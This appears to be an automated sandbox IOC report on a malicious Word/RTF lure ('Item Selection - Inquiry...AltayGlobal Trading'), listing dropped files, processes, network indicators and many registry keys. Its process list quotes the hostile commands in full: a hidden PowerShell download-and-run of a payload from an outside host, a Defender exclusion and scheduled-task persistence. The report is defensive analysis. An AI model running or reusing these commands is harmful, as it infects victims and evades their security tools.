IOC Report
Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc

loading gif

Files

File Path
Type
Category
Malicious
Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
Rich Text Format data, version 1, unknown character set
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
data
dropped
malicious
C:\Users\user\AppData\Local\Temp\tmpE14B.tmp
XML 1.0 document, ASCII text
dropped
malicious
C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\explorer.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\177069AF.wmf
Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA1522E6.png
370 sysV pure executable
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{146C24E6-EE9A-4BF4-BC74-016BA7AD9293}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9CEE7D2D-9EE4-4FEB-932A-E7FDD2AB9079}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CD169163-57D1-49B2-967A-20BA2BE15787}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\tmp6336.tmp
XML 1.0 document, ASCII text
dropped
C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
XML 1.0 document, ASCII text
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:53 2022, mtime=Tue Mar 8 15:45:53 2022, atime=Fri Sep 23 14:13:10 2022, length=221545, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
Little-endian UTF-16 Unicode text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4e04a3.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4e3064.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5F3QBZVQ9RFEIWMV6CQN.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\66P2GWKWYVB9UJIL9LXB.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CQYZNWTS7YT610P4ZIUZ.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DGJNWFN59TABKE06N13V.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QFNUDIY2A3J44VPMGKOZ.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T23CVE88X1M7GW0B4GPE.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4e4412.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF4e978f.TMP (copy)
data
dropped
C:\Users\user\Desktop\~$em Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
data
dropped
There are 22 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
malicious
C:\Users\user\AppData\Roaming\explorer.exe
C:\Users\user\AppData\Roaming\explorer.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
malicious
C:\Windows\SysWOW64\schtasks.exe
C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
malicious
C:\Users\user\AppData\Roaming\explorer.exe
C:\Users\user\AppData\Roaming\explorer.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
malicious
C:\Windows\SysWOW64\schtasks.exe
C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
malicious
C:\Users\user\AppData\Roaming\explorer.exe
C:\Users\user\AppData\Roaming\explorer.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
malicious
C:\Windows\SysWOW64\schtasks.exe
C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
malicious
C:\Windows\System32\notepad.exe
C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
C:\Windows\System32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
There are 12 hidden processes, click here to show them.

URLs

Name
IP
Malicious
httP://login.929
unknown
malicious
httP://login.929389.ank
unknown
malicious
20.126.95.155
malicious
httP://login.929389.ankura.us/Aw
unknown
malicious
http://login.929389.ankura.us
unknown
http://www.piriform.com/ccleaner
unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
unknown
https://github.com/syohex/java-simple-mine-sweeperC:
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown

Domains

Name
IP
Malicious
login.929389.ankura.us
159.223.2.212
malicious

IPs

IP
Domain
Country
Malicious
20.126.95.155
unknown
United States
malicious
159.223.2.212
login.929389.ankura.us
United States
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
MaxConnectionsPer1_0Server
malicious
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
MaxConnectionsPerServer
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
oz0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
g|0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
i~0
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\system32\packager.dll,-2000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
GraphicsFiltersPNGFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\71D50
71D50
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
